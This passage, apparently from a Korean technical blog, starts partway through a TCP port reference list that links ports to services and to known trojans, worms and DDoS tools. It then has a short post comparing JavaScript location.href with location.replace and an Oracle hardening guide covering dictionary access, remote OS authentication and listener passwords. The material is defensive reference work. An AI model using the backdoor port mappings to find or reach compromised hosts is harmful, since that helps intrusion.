TCP 4869 Photon Relay Debug
TCP 4885 ABBS
TCP 4899 RAdmin Win32 remote control
TCP 4983 AT&T Intercom
TCP 5000 UPnP / filmaker.com / Socket de Troie (Windows Trojan)
TCP 5001 filmaker.com / Socket de Troie (Windows Trojan)
TCP 5002 radio free ethernet
TCP 5003 FileMaker Inc. - Proprietary transport
TCP 5004 avt-profile-1
TCP 5005 avt-profile-2
TCP 5006 wsm server
TCP 5007 wsm server ssl
TCP 5010 TelepathStart
TCP 5011 TelepathAttack
TCP 5020 zenginkyo-1
TCP 5021 zenginkyo-2
TCP 5042 asnaacceler8db
TCP 5050 Yahoo Messenger / multimedia conference control tool
TCP 5051 ITA Agent
TCP 5052 ITA Manager
TCP 5055 UNOT
TCP 5060 SIP
TCP 5069 I/Net 2000-NPR
TCP 5071 PowerSchool
TCP 5093 Sentinel LM
TCP 5099 SentLM Srv2Srv
TCP 5101 Yahoo! Messenger
TCP 5145 RMONITOR SECURE
TCP 5150 Ascend Tunnel Management Protocol
TCP 5151 ESRI SDE Instance
TCP 5152 ESRI SDE Instance Discovery
TCP 5165 ife_1corp
TCP 5190 America-Online
TCP 5191 AmericaOnline1
TCP 5192 AmericaOnline2
TCP 5193 AmericaOnline3
TCP 5200 Targus AIB 1
TCP 5201 Targus AIB 2
TCP 5202 Targus TNTS 1
TCP 5203 Targus TNTS 2
TCP 5222 Jabber Server
TCP 5232 SGI Distribution Graphics
TCP 5236 padl2sim
TCP 5272 PK
TCP 5300 HA cluster heartbeat
TCP 5301 HA cluster general services
TCP 5302 HA cluster configuration
TCP 5303 HA cluster probing
TCP 5304 HA Cluster Commands
TCP 5305 HA Cluster Test
TCP 5306 Sun MC Group
TCP 5307 SCO AIP
TCP 5308 CFengine
TCP 5309 J Printer
TCP 5310 Outlaws
TCP 5311 TM Login
TCP 5373 W32.Gluber.B@mm
TCP 5400 Excerpt Search / Blade Runner (Windows Trojan)
TCP 5401 Excerpt Search Secure / Blade Runner (Windows Trojan)
TCP 5402 MFTP / Blade Runner (Windows Trojan)
TCP 5403 HPOMS-CI-LSTN
TCP 5404 HPOMS-DPS-LSTN
TCP 5405 NetSupport
TCP 5406 Systemics Sox
TCP 5407 Foresyte-Clear
TCP 5408 Foresyte-Sec
TCP 5409 Salient Data Server
TCP 5410 Salient User Manager
TCP 5411 ActNet
TCP 5412 Continuus
TCP 5413 WWIOTALK
TCP 5414 StatusD
TCP 5415 NS Server
TCP 5416 SNS Gateway
TCP 5417 SNS Agent
TCP 5418 MCNTP
TCP 5419 DJ-ICE
TCP 5420 Cylink-C
TCP 5421 Net Support 2
TCP 5422 Salient MUX
TCP 5423 VIRTUALUSER
TCP 5426 DEVBASIC
TCP 5427 SCO-PEER-TTA
TCP 5428 TELACONSOLE
TCP 5429 Billing and Accounting System Exchange
TCP 5430 RADEC CORP
TCP 5431 PARK AGENT
TCP 5432 postgres database server
TCP 5435 Data Tunneling Transceiver Linking (DTTL)
TCP 5454 apc-tcp-udp-4
TCP 5455 apc-tcp-udp-5
TCP 5456 apc-tcp-udp-6
TCP 5461 SILKMETER
TCP 5462 TTL Publisher
TCP 5465 NETOPS-BROKER
TCP 5490 Squid HTTP Proxy
TCP 5500 fcp-addr-srvr1
TCP 5501 fcp-addr-srvr2
TCP 5502 fcp-srvr-inst1
TCP 5503 fcp-srvr-inst2
TCP 5504 fcp-cics-gw1
TCP 5510 ACE/Server Services
TCP 5520 ACE/Server Services
TCP 5530 ACE/Server Services
TCP 5540 ACE/Server Services
TCP 5550 ACE/Server Services / Xtcp 2.0x
TCP 5554 Sasser Worm FTP backdoor / SGI ESP HTTP
TCP 5555 Personal Agent / W32.Mimail.P@mm
TCP 5556 Mtbd (mtb backup)
TCP 5559 Enterprise Security Remote Install axent.com
TCP 5599 Enterprise Security Remote Install
TCP 5600 Enterprise Security Manager
TCP 5601 Enterprise Security Agent
TCP 5602 A1-MSC
TCP 5603 A1-BS
TCP 5604 A3-SDUNode
TCP 5605 A4-SDUNode
TCP 5631 pcANYWHEREdata
TCP 5632 pcANYWHEREstat
TCP 5678 LinkSys EtherFast Router Remote Administration / Remote Replication Agent Connection
TCP 5679 Direct Cable Connect Manager
TCP 5680 Canna (Japanese Input)
TCP 5713 proshare conf audio
TCP 5714 proshare conf video
TCP 5715 proshare conf data
TCP 5716 proshare conf request
TCP 5717 proshare conf notify
TCP 5729 Openmail User Agent Layer
TCP 5741 IDA Discover Port 1
TCP 5742 IDA Discover Port 2 / Wincrash (Windows Trojan)
TCP 5745 fcopy-server
TCP 5746 fcopys-server
TCP 5755 OpenMail Desk Gateway server
TCP 5757 OpenMail X.500 Directory Server
TCP 5766 OpenMail NewMail Server
TCP 5767 OpenMail Suer Agent Layer (Secure)
TCP 5768 OpenMail CMTS Server
TCP 5771 NetAgent
TCP 5800 VNC Virtual Network Computing
TCP 5801 VNC Virtual Network Computing
TCP 5813 ICMPD
TCP 5859 WHEREHOO
TCP 5882 Y3k
TCP 5900 VNC Virtual Network Computing
TCP 5901 VNC Virtual Network Computing
TCP 5968 mppolicy-v5
TCP 5969 mppolicy-mgr
TCP 5977 NCD preferences TCP port
TCP 5978 NCD diagnostic TCP port
TCP 5979 NCD configuration TCP port
TCP 5980 VNC Virtual Network Computing
TCP 5981 VNC Virtual Network Computing
TCP 5987 Solaris Web Enterprise Management RMI
TCP 5997 NCD preferences telnet port
TCP 5998 NCD diagnostic telnet port
TCP 5999 CVSup
TCP 6000 X-Windows / W32.LoveGate.ak virus
TCP 6001 Cisco mgmt
TCP 6003 Half-Life WON server
TCP 6063 X Windows System mit.edu
TCP 6064 NDL-AHP-SVC
TCP 6065 WinPharaoh
TCP 6066 EWCTSP
TCP 6067 SRB
TCP 6068 GSMP
TCP 6069 TRIP
TCP 6070 Messageasap
TCP 6071 SSDTP
TCP 6072 DIAGNOSE-PROC
TCP 6073 DirectPlay8
TCP 6100 SynchroNet-db
TCP 6101 SynchroNet-rtc
TCP 6102 SynchroNet-upd
TCP 6103 RETS
TCP 6104 DBDB
TCP 6105 Prima Server
TCP 6106 MPS Server
TCP 6107 ETC Control
TCP 6108 Sercomm-SCAdmin
TCP 6109 GLOBECAST-ID
TCP 6110 HP SoftBench CM
TCP 6111 HP SoftBench Sub-Process Control
TCP 6112 dtspcd / Blizzard Battlenet
TCP 6123 Backup Express
TCP 6129 DameWare
TCP 6141 Meta Corporation License Manager
TCP 6142 Aspen Technology License Manager
TCP 6143 Watershed License Manager
TCP 6144 StatSci License Manager - 1
TCP 6145 StatSci License Manager - 2
TCP 6146 Lone Wolf Systems License Manager
TCP 6147 Montage License Manager
TCP 6148 Ricardo North America License Manager
TCP 6149 tal-pod
TCP 6253 CRIP
TCP 6321 Empress Software Connectivity Server 1
TCP 6322 Empress Software Connectivity Server 2
TCP 6346 Gnutella/Bearshare file sharing Application
TCP 6348 Limewire P2P
TCP 6389 clariion-evr01
TCP 6400 saegatesoftware.com
TCP 6401 saegatesoftware.com
TCP 6402 saegatesoftware.com
TCP 6403 saegatesoftware.com
TCP 6404 saegatesoftware.com
TCP 6405 saegatesoftware.com
TCP 6406 saegatesoftware.com
TCP 6407 saegatesoftware.com
TCP 6408 saegatesoftware.com
TCP 6409 saegatesoftware.com
TCP 6410 saegatesoftware.com
TCP 6455 SKIP Certificate Receive
TCP 6456 SKIP Certificate Send
TCP 6471 LVision License Manager
TCP 6500 BoKS Master
TCP 6501 BoKS Servc
TCP 6502 BoKS Servm
TCP 6503 BoKS Clntd
TCP 6505 BoKS Admin Private Port
TCP 6506 BoKS Admin Public Port
TCP 6507 BoKS Dir Server Private Port
TCP 6508 BoKS Dir Server Public Port
TCP 6547 apc-tcp-udp-1
TCP 6548 apc-tcp-udp-2
TCP 6549 apc-tcp-udp-3
TCP 6550 fg-sysupdate
TCP 6558 xdsxdm
TCP 6588 AnalogX Web Proxy
TCP 6665 Internet Relay Chat
TCP 6666 IRC / Windows Media Unicast Service
TCP 6667 IRC
TCP 6668 IRC
TCP 6669 IRC
TCP 6670 Vocaltec Global Online Directory / Deep Throat 2 (Windows Trojan)
TCP 6672 vision_server
TCP 6673 vision_elmd
TCP 6699 Napster
TCP 6700 Napster / Carracho (server)
TCP 6701 KTI/ICAD Nameserver
TCP 6701 Napster / Carracho (server)
TCP 6711 SubSeven (Windows Trojan)
TCP 6723 DDOS communication TCP
TCP 6767 BMC PERFORM AGENT
TCP 6768 BMC PERFORM MGRD
TCP 6776 SubSeven/BackDoor-G (Windows Trojan)
TCP 6777 W32.Beagle.A trojan
TCP 6789 IBM DB2
TCP 6790 HNMP / IBM DB2
TCP 6831 ambit-lm
TCP 6841 Netmo Default
TCP 6842 Netmo HTTP
TCP 6850 ICCRUSHMORE
TCP 6881 BitTorrent Network
TCP 6888 MUSE
TCP 6891 MS Messenger file transfer
TCP 6901 MS Messenger voice calls
TCP 6961 JMACT3
TCP 6962 jmevt2
TCP 6963 swismgr1
TCP 6964 swismgr2
TCP 6965 swistrap
TCP 6966 swispol
TCP 6969 acmsoda
TCP 6998 IATP-highPri
TCP 6999 IATP-normalPri
TCP 7000 IRC / file server itself
TCP 7001 WebLogic Server / Callbacks to cache managers
TCP 7002 WebLogic Server (SSL) / Half-Life Auth Server / Users & groups database
TCP 7003 volume location database
TCP 7004 AFS/Kerberos authentication service
TCP 7005 volume managment server
TCP 7006 error interpretation service
TCP 7007 Windows Media Services / basic overseer process
TCP 7008 server-to-server updater
TCP 7009 remote cache manager service
TCP 7010 onlinet uninterruptable power supplies
TCP 7011 Talon Discovery Port
TCP 7012 Talon Engine
TCP 7013 Microtalon Discovery
TCP 7014 Microtalon Communications
TCP 7015 Talon Webserver
TCP 7020 DP Serve
TCP 7021 DP Serve Admin
TCP 7070 ARCP
TCP 7099 lazy-ptop
TCP 7100 X Font Service
TCP 7121 Virtual Prototypes License Manager
TCP 7141 vnet.ibm.com
TCP 7161 Catalyst
TCP 7174 Clutild
TCP 7200 FODMS FLIP
TCP 7201 DLIP
TCP 7323 3.11 Remote Administration
TCP 7326 Internet Citizen's Band
TCP 7390 The Swiss Exchange swx.ch
TCP 7395 winqedit
TCP 7426 OpenView DM Postmaster Manager
TCP 7427 OpenView DM Event Agent Manager
TCP 7428 OpenView DM Log Agent Manager
TCP 7429 OpenView DM rqt communication
TCP 7430 OpenView DM xmpv7 api pipe
TCP 7431 OpenView DM ovc/xmpv3 api pipe
TCP 7437 Faximum
TCP 7491 telops-lmd
TCP 7511 pafec-lm
TCP 7544 FlowAnalyzer DisplayServer
TCP 7545 FlowAnalyzer UtilityServer
TCP 7566 VSI Omega
TCP 7570 Aries Kfinder
TCP 7588 Sun License Manager
TCP 7597 TROJAN WORM
TCP 7633 PMDF Management
TCP 7640 CUSeeMe
TCP 7777 Oracle App server / cbt
TCP 7778 Windows Media Services / Interwise
TCP 7781 accu-lmgr
TCP 7786 MINIVEND
TCP 7932 Tier 2 Data Resource Manager
TCP 7933 Tier 2 Business Rules Manager
TCP 7967 Supercell
TCP 7979 Micromuse-ncps
TCP 7980 Quest Vista
TCP 7999 iRDMI2
TCP 8000 HTTP/iRDMI
TCP 8001 HTTP/VCOM Tunnel
TCP 8002 HTTP/Teradata ORDBMS
TCP 8007 Apache JServ Protocol
TCP 8008 HTTP Alternate
TCP 8009 Apache JServ Protocol
TCP 8010 Wingate HTTP Proxy
TCP 8032 ProEd
TCP 8033 MindPrint
TCP 8080 HTTP / HTTP Proxy
TCP 8081 HTTP / HTTP Proxy
TCP 8082 BlackICE Capture
TCP 8129 Snapstream PVS Server
TCP 8130 INDIGO-VRMI
TCP 8131 INDIGO-VBCP
TCP 8160 Patrol
TCP 8161 Patrol SNMP
TCP 8181 IPSwitch IMail / Monitor
TCP 8200 TRIVNET
TCP 8201 TRIVNET
TCP 8204 LM Perfworks
TCP 8205 LM Instmgr
TCP 8206 LM Dta
TCP 8207 LM SServer
TCP 8208 LM Webwatcher
TCP 8351 Server Find
TCP 8376 Cruise ENUM
TCP 8377 Cruise SWROUTE
TCP 8378 Cruise CONFIG
TCP 8379 Cruise DIAGS
TCP 8380 Cruise UPDATE
TCP 8383 Web Email
TCP 8400 cvd
TCP 8401 sabarsd
TCP 8402 abarsd
TCP 8403 admind
TCP 8431 Micro PC-Cilin
TCP 8450 npmp
TCP 8473 Virtual Point to Point
TCP 8484 Ipswitch IMail
TCP 8554 RTSP Alternate (see port 554)
TCP 8733 iBus
TCP 8763 MC-APPSERVER
TCP 8764 OPENQUEUE
TCP 8765 Ultraseek HTTP
TCP 8804 truecm
TCP 8866 W32.Beagle.B trojan
TCP 8880 CDDBP
TCP 8888 NewsEDGE server TCP / AnswerBook2
TCP 8889 Desktop Data TCP 1
TCP 8890 Desktop Data TCP 2
TCP 8891 Desktop Data TCP 3: NESS application
TCP 8892 Desktop Data TCP 4: FARM product
TCP 8893 Desktop Data TCP 5: NewsEDGE/Web application
TCP 8894 Desktop Data TCP 6: COAL application
TCP 8900 JMB-CDS 1
TCP 8901 JMB-CDS 2
TCP 8967 Win32/Dabber (Windows worm)
TCP 8999 Firewall
TCP 9000 CSlistener
TCP 9001 cisco-xremote
TCP 9090 WebSM
TCP 9100 HP JetDirect
TCP 9160 NetLOCK1
TCP 9161 NetLOCK2
TCP 9162 NetLOCK3
TCP 9163 NetLOCK4
TCP 9164 NetLOCK5
TCP 9200 WAP connectionless session service
TCP 9201 WAP session service
TCP 9202 WAP secure connectionless session service
TCP 9203 WAP secure session service
TCP 9204 WAP vCard
TCP 9205 WAP vCal
TCP 9206 WAP vCard Secure
TCP 9207 WAP vCal Secure
TCP 9273 BackGate (Windows rootkit)
TCP 9274 BackGate (Windows rootkit)
TCP 9275 BackGate (Windows rootkit)
TCP 9276 BackGate (Windows rootkit)
TCP 9277 BackGate (Windows rootkit)
TCP 9278 BackGate (Windows rootkit)
TCP 9280 HP JetDirect Embedded Web Server
TCP 9290 HP JetDirect
TCP 9291 HP JetDirect
TCP 9292 HP JetDirect
TCP 9321 guibase
TCP 9343 MpIdcMgr
TCP 9344 Mphlpdmc
TCP 9374 fjdmimgr
TCP 9396 fjinvmgr
TCP 9397 MpIdcAgt
TCP 9400 InCommand
TCP 9500 ismserver
TCP 9535 Remote man server
TCP 9537 Remote man server, testing
TCP 9594 Message System
TCP 9595 Ping Discovery Service
TCP 9600 MICROMUSE-NCPW
TCP 9753 rasadv
TCP 9876 Session Director
TCP 9888 CYBORG Systems
TCP 9898 MonkeyCom / Win32/Dabber (Windows worm)
TCP 9899 SCTP TUNNELING
TCP 9900 IUA
TCP 9909 domaintime
TCP 9950 APCPCPLUSWIN1
TCP 9951 APCPCPLUSWIN2
TCP 9952 APCPCPLUSWIN3
TCP 9992 Palace
TCP 9993 Palace
TCP 9994 Palace
TCP 9995 Palace
TCP 9996 Sasser Worm shell / Palace
TCP 9997 Palace
TCP 9998 Distinct32
TCP 9999 distinct / Win32/Dabber (Windows worm)
TCP 10000 Webmin / Network Data Management Protocol/ Dumaru.Y (Windows trojan)
TCP 10001 queue
TCP 10002 poker
TCP 10003 gateway
TCP 10004 remp
TCP 10005 Secure telnet
TCP 10007 MVS Capacity
TCP 10012 qmaster
TCP 10080 Amanda / MyDoom.B (Windows trojan)
TCP 10082 Amanda Indexing
TCP 10083 Amanda Tape Indexing
TCP 10113 NetIQ Endpoint
TCP 10114 NetIQ Qcheck
TCP 10115 Ganymede Endpoint
TCP 10128 BMC-PERFORM-SERVICE DAEMON
TCP 10202 Computer Associate License Manager
TCP 10203 Computer Associate License Manager
TCP 10204 Computer Associate License Manager
TCP 10288 Blocks
TCP 10520 Acid Shivers (Windows Trojan)
TCP 11000 IRISA
TCP 11001 Metasys
TCP 11111 Viral Computing Environment (VCE)
TCP 11117 W32.Beagle.L trojan / URBISNET
TCP 11367 ATM UHAS
TCP 11523 AOL / AdSubtract AOL Proxy
TCP 11720 h323 Call Signal Alternate
TCP 11722 RK Test
TCP 12000 IBM Enterprise Extender SNA XID Exchange
TCP 12001 IBM Enterprise Extender SNA COS Network Priority
TCP 12002 IBM Enterprise Extender SNA COS High Priority
TCP 12003 IBM Enterprise Extender SNA COS Medium Priority
TCP 12004 IBM Enterprise Extender SNA COS Low Priority
TCP 12172 HiveP
TCP 12345 Netbus (Windows Trojan)
TCP 12346 NetBus (Windows Trojan)
TCP 12348 BioNet (Windows Trojan)
TCP 12349 BioNet (Windows Trojan)
TCP 12361 Whack-a-mole (Windows Trojan)
TCP 12362 Whack-a-mole (Windows Trojan)
TCP 12753 tsaf port
TCP 12754 DDOS communication TCP
TCP 13160 I-ZIPQD
TCP 13223 PowWow Client
TCP 13224 PowWow Server
TCP 13326 game
TCP 13720 BPRD Protocol (VERITAS NetBackup)
TCP 13721 BPBRM Protocol (VERITAS NetBackup)
TCP 13722 BP Java MSVC Protocol
TCP 13782 VERITAS NetBackup
TCP 13783 VOPIED Protnocol
TCP 13818 DSMCC Config
TCP 13819 DSMCC Session Messages
TCP 13820 DSMCC Pass-Thru Messages
TCP 13821 DSMCC Download Protocol
TCP 13822 DSMCC Channel Change Protocol
TCP 14001 ITU SCCP (SS7)
TCP 14237 Palm Network Hotsync
TCP 14247 Mitglieder.H trojan
TCP 15104 DDOS communication TCP
TCP 16360 netserialext1
TCP 16361 netserialext2
TCP 16367 netserialext3
TCP 16368 netserialext4
TCP 16660 Stacheldraht distributed attack tool client
TCP 16959 Subseven DEFCON8 2.1 backdoor remote access tool
TCP 16991 INTEL-RCI-MP
TCP 17007 isode-dua
TCP 17219 Chipper
TCP 17300 Kuang2 (Windows trojan)
TCP 17569 Infector
TCP 17990 Worldspan gateway
TCP 18000 Beckman Instruments Inc.
TCP 18181 OPSEC CVP
TCP 18182 OPSEC UFP
TCP 18183 OPSEC SAM
TCP 18184 OPSEC LEA
TCP 18185 OPSEC OMI
TCP 18187 OPSEC ELA
TCP 18463 AC Cluster
TCP 18753 Shaft distributed attack tool handler agent
TCP 18888 APCNECMP
TCP 19216 BackGate (Windows rootkit)
TCP 19283 Key Server for SASSAFRAS
TCP 19315 Key Shadow for SASSAFRAS
TCP 19410 hp-sco
TCP 19411 hp-sca
TCP 19412 HP-SESSMON
TCP 19541 JCP Client
TCP 20000 DNP
TCP 20005 xcept4 (German Telekom's CEPT videotext service)
TCP 20031 BakBone NetVault
TCP 20034 NetBus 2 Pro (Windows Trojan)
TCP 20432 Shaft distributed attack client
TCP 20670 Track
TCP 20742 Mitglieder.E trojan
TCP 20999 At Hand MMP
TCP 21554 Girlfriend (Windows Trojan)
TCP 21590 VoFR Gateway
TCP 21845 webphone
TCP 21846 NetSpeak Corp. Directory Services
TCP 21847 NetSpeak Corp. Connection Services
TCP 21848 NetSpeak Corp. Automatic Call Distribution
TCP 21849 NetSpeak Corp. Credit Processing System
TCP 22000 SNAPenetIO
TCP 22001 OptoControl
TCP 22156 Phatbot Worm
TCP 22273 wnn6
TCP 22289 Wnn6 (Chinese Input)
TCP 22305 Wnn6 (Korean Input)
TCP 22321 Wnn6 (Taiwanese Input)
TCP 22555 Vocaltec Web Conference
TCP 22800 Telerate Information Platform LAN
TCP 22951 Telerate Information Platform WAN
TCP 23005 W32.HLLW.Nettrash
TCP 23006 W32.HLLW.Nettrash
TCP 23432 Asylum
TCP 23476 Donald Dick
TCP 23477 Donald Dick
TCP 23485 Shareasa file sharing
TCP 24000 med-ltp
TCP 24001 med-fsp-rx
TCP 24002 med-fsp-tx
TCP 24003 med-supp
TCP 24004 med-ovw
TCP 24005 med-ci
TCP 24006 med-net-svc
TCP 24386 Intel RCI
TCP 24554 BINKP
TCP 25000 icl-twobase1
TCP 25001 icl-twobase2
TCP 25002 icl-twobase3
TCP 25003 icl-twobase4
TCP 25004 icl-twobase5
TCP 25005 icl-twobase6
TCP 25006 icl-twobase7
TCP 25007 icl-twobase8
TCP 25008 icl-twobase9
TCP 25009 icl-twobase10
TCP 25555 Mitglieder.D trojan
TCP 25793 Vocaltec Address Server
TCP 25867 WebCam32 Admin
TCP 26000 quake
TCP 26208 wnn6-ds
TCP 26274 Delta Source (Windows Trojan)
TCP 27347 SubSeven / Linux.Ramen.Worm (RedHat Linux)
TCP 27374 SubSeven / Linux.Ramen.Worm (RedHat Linux)
TCP 27665 Trinoo distributed attack tool Master server control port
TCP 27999 TW Authentication/Key Distribution and
TCP 30100 Netsphere (Windows Trojan)
TCP 30101 Netsphere (Windows Trojan)
TCP 30102 Netsphere (Windows Trojan)
TCP 30999 Kuang
TCP 31337 BO2K
TCP 31785 Hack-A-Tack (Windows Trojan)
TCP 31787 Hack-A-Tack (Windows Trojan)
TCP 31788 Hack-A-Tack (Windows Trojan)
TCP 31789 Hack-A-Tack (Windows Trojan)
TCP 31791 Hack-A-Tack (Windows Trojan)
TCP 32000 XtraMail v1.11
TCP 32768 Filenet TMS
TCP 32769 Filenet RPC
TCP 32770 Filenet NCH
TCP 32771 Solaris RPC
TCP 32772 Solaris RPC
TCP 32773 Solaris RPC
TCP 32774 Solaris RPC
TCP 32775 Solaris RPC
TCP 32776 Solaris RPC
TCP 32777 Solaris RPC
TCP 32780 RPC
TCP 33434 traceroute use
TCP 34324 Big Gluck (Windows Trojan)
TCP 36865 KastenX Pipe
TCP 40421 Master's Paradise (Windows Trojan)
TCP 40422 Master's Paradise (Windows Trojan)
TCP 40423 Master's Paradise (Windows Trojan)
TCP 40426 Master's Paradise (Windows Trojan)
TCP 40841 CSCP
TCP 42424 ASP.NET Session State
TCP 43118 Reachout
TCP 43188 Reachout
TCP 44333 Kerio WinRoute Firewall Administration
TCP 44334 Kerio Personal Firewall Administration
TCP 44337 Kerio MailServer Administration
TCP 44444 Prosiak
TCP 44818 Rockwell Encapsulation
TCP 45092 BackGate (Windows rootkit)
TCP 45678 EBA PRISE
TCP 45966 SSRServerMgr
TCP 47262 Delta Source (Windows Trojan)
TCP 47557 Databeam Corporation
TCP 47624 Direct Play Server
TCP 47806 ALC Protocol
TCP 47808 Building Automation and Control Networks
TCP 48000 Nimbus Controller
TCP 48001 Nimbus Spooler
TCP 48002 Nimbus Hub
TCP 48003 Nimbus Gateway
TCP 49400 Compaq Insight Manager
TCP 49401 Compaq Insight Manager
TCP 50300 O&O Defrag
TCP 51515 Microsoft Operations Manager MOM-Clear
TCP 52673 Stickies
TCP 54283 SubSeven
TCP 54320 Orifice 2000 (TCP)
TCP 54321 Orifice 2000 (TCP)
TCP 60000 DeepThroat
TCP 65000 distributed attack tool / Devil (Windows Trojan)
TCP 65301 pcAnywhere-def
TCP 65506 PhatBot, Agobot, Gaobot (Windows trojans)
javascript 페이지이동명령어의 차이점
javascript 로 페이지를 이동시키는 방법은 여러가지가 있다.
그중에 가장 일반적인 방법은 아마도 location.href = "{페이지URL}" 이 아닌가 싶다.
이 방법 말고도 location.replace("{페이지URL}") 도 가능하다.
그럼 이 두녀석의 차이점은 무엇일까... 한번 알아보자.
모든 답은 내가 항상 애용하는 MSDN 에 다 있다. 그럼 확인해 보자.
일단 href 속성에는 별 특별한 설명이 없다. ㅡ,.ㅡ... 단지 "Sets or retrieves the entire URL as a string." 라고만 나와있다. 머.. 설명할게 별로 없나보다. ㅎㅎㅎ
그럼 이번엔 replace() 이녀석을 한번 보자.
"When a document is replaced, it is also removed from the history object. Moreover, the user interface navigation methods, such as the Back and Forward buttons, will no longer access the URL." 이라고 설명 해 놨다.
요놈은 href 하고는 다르게 좀 특별하다.
replace 하게되면 history에서 사라진다(removed). 브라우져의 뒤로, 앞으로 버튼을 눌러도 그 페이지로는 안간다는 말이다. history 에서 그 페이지의 정보는 사라지니 말이다.
요놈은 권한체크나 보안쪽 관련해서 쓰면 유용할 듯 싶다.
Parameter 설정을 통한 오라클 보안
오라클의 보안을 강화하기 위해 지난 호에서 알아본 "OEM(Oracle Enterprise Manager)을 이용한 오라클 계정 관리"에 이어서 이번 호에서는 파라미터 설정을 통해 오라클의 보안을 강화할 수 있는 방법에 대해 알아보겠다.
1. Data Dictionary 보호
Data Dictionary는 데이터베이스의 핵심 정보가 기록되는 곳으로 데이터 베이스의 구조, 객체에 대한 정의 및 공간 할당, 사용자, 롤(role), 권한, 감사 와 같은 정보들을 제공한다. Data Dictionary는 테이블의 형태로 제공되며 데이터베이스 엔진에서 관리하여 사용자가 직접 변경할 수 없도록 되어있다. 또한 Data Dictionary는 대부분 DBA_, ALL_, USER_ 로 시작하는 접두어를 가지고 있어 구분하기가 쉽다.
이러한 Data Dictionary는 'DROP ANY TABLE' 시스템 권한 가진 사용자가 악의적으로 Data Dictionary 테이블의 삭제가 가능하므로 오라클에서 제공하는 파라미터를 변경하여 DBA 권한으로 접속한 사용자만이 Data Dictionary의 ANY 시스템권한을 사용할 수 있도록 해야 한다.
** 파라미터 파일 오라클 데이터베이스 인스턴스의 초기화 설정에 사용되며 텍스트 형식인 PFILE과 바이너리 형태인 SPFILE이 존재한다. PFILE은 init
|
OEM(Oracle Enterprise Manager)을 이용하여 파라미터 파일을 확인하고 설정하기 위해서는 다음과 같은 방법을 이용한다.
① OEM에서 [데이터베이스] -> [세부정보보기/편집] -> [데이터베이스 편집] -> [모든 초기화 매개변수...] 창을 열어 [모든 매개변수]탭을 확인하면 다음과 같이 현재 적용된 모든 파라미터의 값을 확인할 수 있다.
Data Dictionary와 관련된 파라미터는 7_DICTIONARY_ACCESSIBILITY으로 해당 값을 FALSE로 설정하여 Data Dictionary를 보호해야 한다.
② [모든 매개변수]탭에서 [SPFILE]을 선택하여 현재 구성파일(SPFILE)에 있는 O7_DICTIONARY_ACCESSIBILITY 파라미터의 값이 TRUE로 되어 있을 경우 이를 변경하여야 한다.
Oracle 9i 및 10g에서는 O7_DICTIONARY_ACCESSIBILITY 파라미터의 값이 기본적으로 FALSE로 설정되어 있으나 Oracle8i는 TRUE로 설정되어 있으므로 반드시 변경하여야 한다.
③ O7_DICTIONARY_ACCESSIBILITY 파라미터의 값을 변경한 후 [적용]을 누르면 다음과 같이 데이터베이스를 재시작하라는 메시지가 뜬다. 이때 데이터베이스를 재시작해야만 변경된 파라미터의 값이 적용된다.
참고로 SPFILE에서 동적 매개변수를 변경할 경우 현재 실행중인 메모리에 즉시 반영이 되고 동시에 SPFILE에 저장되나 O7_DICTIONARY_ACCESSIBILITY와 같은 정적 매개변수의 값이 변경된 경우 변경된 값은 SPFILE파일에만 저장되므로 데이터베이스를 재시작하여 변경된 값을 적용해야 한다.
2. 원격 인증기능 설정
오라클에서 지원하는 원격인증 기능이 활성화되면, 원격의 클라이언트는 오라클 데이터베이스에 접속할 수 있도록 허용된다. 즉, 데이터베이스는 적절하게 인증된 (클라이언트 자체OS의 인증) 모든 클라이언트들을 신뢰한다. 그러나 PC와 같은 클라이언트의 경우 Virus, Worm, Backdoor 등이 설치되어 있을 수 있어 데이터베이스에 접속할 경우 적절한 인증여부를 보장할 수 없어 보안이 대단히 취약해진다.
이러한 원격 인증기능을 비활성화시켜 오라클 데이터베이스에 접속하는 클라이언트는 Server-Based 인증(데이터베이스 어플리케이션의 인증)을 하도록 파라미터를 변경하여 보안을 강화하여야 한다.
OEM(Oracle Enterprise Manager)을 이용하여 파라미터 파일을 확인하고 설정하기 위해서는 다음과 같은 방법을 이용한다.
① OEM에서 [데이터베이스] -> [세부정보보기/편집] -> [데이터베이스 편집] -> [모든 초기화 매개변수...] 창을 열어 [모든 매개변수]탭의 구성파일(SPFILE)을 선택한 후 파리미터 값을 확인한다.
원격 인증기능과 관련된 파라미터는 REMOTE_OS_AUTHENT으로 해당 값을 FALSE로 설정하여 OS인증이 아닌 오라클 어플리케이션의 인증을 받도록 설정한다.
Oracle 9i 및 10g 에서는 O7_DICTIONARY_ACCESSIBILITY 파라미터와 같이 REMOTE_OS_AUTHENT 파라미터의 값이 기본적으로 FALSE로 설정되어 있으나 Oracle8i는 TRUE로 설정되어 있으므로 반드시 변경하여야 한다.
② REMOTE_OS_AUTHENT 파라미터의 값을 변경한 후에는 Data Dictionary 를 위한 파라미터 변경과 마찬가지로 데이터베이스를 재시작하여 변경된 파라미터값을 적용하면 된다.
3. Listener의 설정 제한
Listener는 오라클 데이터베이스에 원격의 클라이언트가 접속할 수 있도록 실행되는 프로세스이며 클라이언트측의 요청을 받아 실제 쿼리문을 수행하는 서버프로세스를 생성하게 된다.
그러나 Listener의 패스워드는 디폴트로 설정되어 있지 않아 오라클의 service Name을 알경우 공격자에 의하여 Listener프로세스가 시작/정지 또는 재설정될 수 있다.
** Service Name 하나의 오라클 서버에 여러 DBMS프로세스(인스턴스)가 동작할 경우 이를 구별하기 위해 하나의 인스턴스를 Service Name으로 나타내게 된다. 이러한 Service Name은 sid, 서버IP, 접속 프로토콜 등의 정보로 구성이 되며 TNSNAME.ORA 파일에 의해서 정의되게 된다. |
이러한 Listener에 패스워드를 설정하여 임의의 공격자가 Listener를 정지시켜 원격의 사용자가 오라클에 접속하지 못하게 하는 것을 방지하여야 한다. Listener에 패스워드는 LSNRCTL 유틸리티의 change_password 명령어를 이용하여 설정이 가능하며 설정된 패스워드는 LISTENER.ORA파일에 암호화되어 저장되게 된다.
Listener에 패스워드를 설정하기 위해서는 LSNCTL유틸리티를 사용하며 다음과 순서로 진행된다.
OS> lsnrctl LSNRCTL> set current_listener LISTENER LSNRCTL> set save_config_on_stop on LSNRCTL> change_password Old password: 처음의 경우 enter New password: ****** Reenter new password: ****** |
위와 같이 설정한 후 Listener에 설정된 내용을 확인하기 위해서는$ORACLE_HOME/network/admin/listener.ora 경로에 존재하는 LISTENER.ORA파일을 텍스트에디터를 이용하여 확인해 보면 된다.
LISTENER.ORA파일에 다음과 같이 설정되어 있을 경우 Listener의 시작 및 정지 시에 패스워드를 물어보게 된다.
SAVE_CONFIG_ON_STOP_LISTENER = ON PASSWORDS_LISTENER = 2D6C48144CF753AC |
